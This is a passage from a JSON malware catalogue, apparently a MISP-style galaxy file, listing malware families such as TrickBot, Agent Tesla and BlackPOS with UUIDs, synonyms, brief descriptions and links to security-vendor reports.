"https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/", - "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv", - "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/" - ] - } - }, - { - "uuid": "4350b52a-8100-49b5-848d-d4a4029e949d", - "value": "Bunitu", - "description": "Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72).", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/", - "http://malware-traffic-analysis.net/2017/05/09/index.html", - "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/", - "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/" - ] - } - }, - { - "uuid": "bbbef449-2fe6-4c25-a85c-69af9fa6208b", - "value": "Joanap", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.us-cert.gov/ncas/alerts/TA18-149A", - "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", - "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" - ] - } - }, - { - "uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7", - "value": "witchcoven", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf" - ] - } - }, - { - "uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e", - "value": "Coreshell", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", - "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html", - "http://malware.prevenity.com/2014/08/malware-info.html" - ] - } - }, - { - "uuid": "467c726e-6e19-4d15-88b6-362cbe0b3d20", - "value": "SnatchLoader", - "description": "A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/", - "https://twitter.com/VK_Intel/status/898549340121288704", - "https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/", - "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/" - ] - } - }, - { - "uuid": "15dd8386-f11a-485a-b719-440c0a47dee6", - "value": "SHAPESHIFT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" - ] - } - }, - { - "uuid": "d7e31f19-8bf2-4def-8761-6c5bf7feaa44", - "value": "Proton RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does", - "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/", - "https://objective-see.com/blog/blog_0x1D.html", - "https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/", - "https://objective-see.com/blog/blog_0x1F.html", - "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", - "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/", - "https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf" - ] - } - }, - { - "uuid": "b8e87440-6005-459c-9a20-35516ce2fa5b", - "value": "Lazarus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/" - ] - } - }, - { - "uuid": "bd29030e-d440-4842-bc2a-c173ed938da4", - "value": "Spedear", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] - } - }, - { - "uuid": "9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c", - "value": "FireMalv", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" - ] - } - }, - { - "uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea", - "value": "Jasus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - } - }, - { - "uuid": "70059ec2-9315-4af7-b65b-2ec35676a7bb", - "value": "Pwnet", - "description": "Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/" - ] - } - }, - { - "uuid": "c824813c-9c79-4917-829a-af72529e8329", - "value": "TrickBot", - "description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tacitcs. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.", - "meta": { - "synonyms": [ - "Trickster", - "TheTrick", - "TrickLoader" - ], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", - "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", - "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", - "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", - "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", - "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", - "https://www.youtube.com/watch?v=KMcSAlS9zGE", - "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/", - "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", - "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", - "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader", - "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/", - "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", - "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", - "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", - "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets", - "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", - "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", - "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", - "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", - "http://www.malware-traffic-analysis.net/2018/02/01/", - "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", - "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", - "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", - "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", - "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-3-core", - "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html", - "https://www.youtube.com/watch?v=EdchPEHnohw", - "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html", - "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", - "https://www.youtube.com/watch?v=lTywPmZEU1A", - "https://qmemcpy.github.io/post/reverse-engineering-malware-trickbot-part-1-packer", - "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf", - "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/" - ] - } - }, - { - "uuid": "e248d80d-de8e-45de-b6d0-3740e5b34573", - "value": "ATI-Agent", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" - ] - } - }, - { - "uuid": "b6b187d0-e19f-489a-91c0-7c94519555f6", - "value": "c0d0so0", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "5b75db42-b8f2-4e52-81d3-f329e49e1af2", - "value": "Manifestus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/struppigel/status/811587154983981056" - ] - } - }, - { - "uuid": "70459959-5a20-482e-b714-2733f5ff310e", - "value": "KLRD", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://www.morphick.com/resources/news/klrd-keylogger" - ] - } - }, - { - "uuid": "7a38c552-0e1a-4980-8d62-1aa38617efab", - "value": "SMSspy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "19d89300-ff97-4281-ac42-76542e744092", - "value": "Helminth", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", - "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", - "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" - ] - } - }, - { - "uuid": "9803b201-28e5-40c5-b661-c1a191388072", - "value": "ScreenLocker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/struppigel/status/791535679905927168" - ] - } - }, - { - "uuid": "8098d303-cb5f-4eff-b62e-96bb5ef4329f", - "value": "Loda", - "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.", - "meta": { - "synonyms": [ - "Nymeria" - ], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware", - "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/" - ] - } - }, - { - "uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82", - "value": "Roaming Mantis", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/", - "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/" - ] - } - }, - { - "uuid": "69a3e0ed-1727-4a9c-ae21-1e32322ede93", - "value": "Buzus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f", - "value": "Prikorma", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf" - ] - } - }, - { - "uuid": "0404cb3e-1390-4010-a368-80ee585ddd59", - "value": "Dented", - "description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added.", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "1dc53eb8-ffae-4823-9c11-3c01514398b9", - "value": "Cuegoe", - "description": "", - "meta": { - "synonyms": [ - "Windshield?" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3451", - "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html", - "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal" - ] - } - }, - { - "uuid": "e4e15ab4-9ba6-444a-b154-2854757e792e", - "value": "CMSTAR", - "description": "", - "meta": { - "synonyms": [ - "meciv" - ], - "type": [], - "refs": [ - "https://twitter.com/ClearskySec/status/963829930776723461", - "https://www.votiro.com/single-post/2018/02/13/New-campaign-targeting-Ukrainians-holds-secrets-in-documents-properties", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", - "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" - ] - } - }, - { - "uuid": "9a724a1d-7eb1-4e2b-8cc3-e1b41e8b5cff", - "value": "Machete", - "description": "", - "meta": { - "synonyms": [ - "El Machete" - ], - "type": [], - "refs": [ - "https://securelist.com/el-machete/66108/", - "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html", - "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6" - ] - } - }, - { - "uuid": "6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c", - "value": "ChChes", - "description": "", - "meta": { - "synonyms": [ - "Ham Backdoor" - ], - "type": [], - "refs": [ - "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html", - "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html", - "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", - "https://www.jpcert.or.jp/magazine/acreport-ChChes.html", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" - ] - } - }, - { - "uuid": "1e62fc1f-daa7-416f-9159-099798bb862c", - "value": "BlackPOS", - "description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials. ", - "meta": { - "synonyms": [ - "Reedum", - "POSWDS", - "Kaptoxa" - ], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/" - ] - } - }, - { - "uuid": "c28e9055-b656-4b7a-aa91-fe478a83fe4c", - "value": "Tyupkin", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.lastline.com/labsblog/tyupkin-atm-malware/" - ] - } - }, - { - "uuid": "f44e6d03-54c0-47af-b228-0040299c349c", - "value": "Dexter", - "description": "", - "meta": { - "synonyms": [ - "LusyPOS" - ], - "type": [], - "refs": [ - "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html", - "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/", - "http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html", - "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/25000/PD25658/en_US/McAfee_Labs_Threat_Advisory-LusyPOS.pdf", - "https://blog.fortinet.com/2014/03/10/how-dexter-steals-credit-card-information", - "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/" - ] - } - }, - { - "uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0", - "value": "Spamtorte", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://cyber.verint.com/resource/spamtorte-v2-investigating-a-multi-layered-spam-botnet/" - ] - } - }, - { - "uuid": "8420653b-1412-45a1-9a2d-6aa9b9eaf906", - "value": "Swift?", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" - ] - } - }, - { - "uuid": "7007b268-f6f4-4a01-9184-fc2334461c38", - "value": "SysScan", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "22755fda-497e-4ef0-823e-5cb6d8701420", - "value": "InvisiMole", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" - ] - } - }, - { - "uuid": "3cec2c3c-1669-40cf-8612-eb826f7d2c98", - "value": "Excalibur", - "description": "", - "meta": { - "synonyms": [ - "Sabresac", - "Saber" - ], - "type": [], - "refs": [ - "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" - ] - } - }, - { - "uuid": "06f63e6b-d177-4e21-b432-e3a219bc0965", - "value": "r980", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/" - ] - } - }, - { - "uuid": "a3370013-6c47-422e-a4d4-1b86ee71e5e5", - "value": "Miancha", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.contextis.com//documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf" - ] - } - }, - { - "uuid": "26aa3c43-5049-4a2e-bec1-9709b31a1a26", - "value": "soraya", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/the-best-of-both-worlds-soraya/" - ] - } - }, - { - "uuid": "33f97c52-0bcd-43f4-88bb-99e7da9f49ae", - "value": "XP PrivEsc (CVE-2014-4076)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf" - ] - } - }, - { - "uuid": "e46262cd-961f-4c7d-8976-0d35a066ab83", - "value": "Abbath Banker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "10d0115a-00b4-414e-972b-8320a2bb873c", - "value": "DoubleLocker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/" - ] - } - }, - { - "uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b", - "value": "Hide and Seek", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/", - "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/" - ] - } - }, - { - "uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66", - "value": "CadelSpy", - "description": "", - "meta": { - "synonyms": [ - "Cadelle" - ], - "type": [], - "refs": [ - "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" - ] - } - }, - { - "uuid": "e3065e43-503b-4496-921b-7601dd3d6abd", - "value": "Auriga", - "description": "", - "meta": { - "synonyms": [ - "Riodrv" - ], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "3521faaa-1136-4e50-9fe2-3f33359e8b1d", - "value": "DarkMegi", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html", - "http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html" - ] - } - }, - { - "uuid": "28c13455-7f95-40a5-9568-1e8732503507", - "value": "KeyBoy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", - "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html" - ] - } - }, - { - "uuid": "a492a3e0-13cb-4b7d-93c1-027e7e69b44d", - "value": "AbaddonPOS", - "description": "", - "meta": { - "synonyms": [ - "PinkKite" - ], - "type": [], - "refs": [ - "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/", - "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak" - ] - } - }, - { - "uuid": "f691663a-b360-4c0d-a4ee-e9203139c38e", - "value": "Marcher", - "description": "", - "meta": { - "synonyms": [ - "ExoBot" - ], - "type": [], - "refs": [ - "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware", - "https://www.clientsidedetection.com/marcher.html", - "https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html" - ] - } - }, - { - "uuid": "0bc03bfa-1439-4162-bb33-ec9f8f952ee5", - "value": "NetC", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - } - }, - { - "uuid": "1482ffff-47a8-46da-8f47-d363c9d86c0e", - "value": "Rockloader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware" - ] - } - }, - { - "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", - "value": "Lazarus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/", - "https://twitter.com/PhysicalDrive0/status/828915536268492800", - "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html", - "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html" - ] - } - }, - { - "uuid": "c346faf0-9eb4-4f8a-8547-30e6641b8972", - "value": "KrDownloader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fidelissecurity.com/threatgeek/2017/05/blackmoon-rising-banking-trojan-back-new-framework" - ] - } - }, - { - "uuid": "74360d1e-8f85-44d1-8ce7-e76afb652142", - "value": "CpuMeaner", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/" - ] - } - }, - { - "uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58", - "value": "Adylkuzz", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar" - ] - } - }, - { - "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3", - "value": "TDTESS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.clearskysec.com/tulip/" - ] - } - }, - { - "uuid": "b933634f-81d0-41ef-bf2f-ea646fc9e59c", - "value": "TinyZbot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - } - }, - { - "uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65", - "value": "Bateleur", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor" - ] - } - }, - { - "uuid": "9e5d83a8-1181-43fe-a77f-28c8c75ffbd0", - "value": "Satori", - "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361).", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/", - "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/", - "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/", - "https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/", - "http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori" - ] - } - }, - { - "uuid": "5af4838f-1b4d-4f0b-bd27-50ef532e84f7", - "value": "Urausy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6", - "value": "ManItsMe", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8", - "value": "BlackRevolution", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delphi/" - ] - } - }, - { - "uuid": "64b34624-37de-4c51-8856-e721e31e67db", - "value": "Mokes", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/", - "https://objective-see.com/blog/blog_0x16.html" - ] - } - }, - { - "uuid": "bbbf4786-1aba-40ac-8ad7-c9d8c66197a8", - "value": "tDiscoverer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" - ] - } - }, - { - "uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca", - "value": "Project Alice", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/" - ] - } - }, - { - "uuid": "6e94186c-987e-43da-be2d-9b44f254c8b9", - "value": "AlphaNC", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" - ] - } - }, - { - "uuid": "f82f8d2c-695e-461a-bd4f-a7dc58531063", - "value": "Grateful POS", - "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html", - "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season" - ] - } - }, - { - "uuid": "f982fa2d-f78f-4fe1-a86d-d10471a3ebcf", - "value": "Konni", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html", - "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant", - "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/", - "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html" - ] - } - }, - { - "uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417", - "value": "Rootnik", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer", - "https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java" - ] - } - }, - { - "uuid": "afb6a7cc-4185-4f19-8ad4-45dcbb76e544", - "value": "Unidentified APK 002", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380", - "value": "Agent Tesla", - "description": "A .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/", - "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/", - "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting", - "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr", - "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/", - "https://blogs.forcepoint.com/security-labs/part-two-camouflage-netting" - ] - } - }, - { - "uuid": "541b64bc-87ec-4cc2-aaee-329355987853", - "value": "FinFisher RAT", - "description": "", - "meta": { - "synonyms": [ - "FinSpy" - ], - "type": [], - "refs": [ - 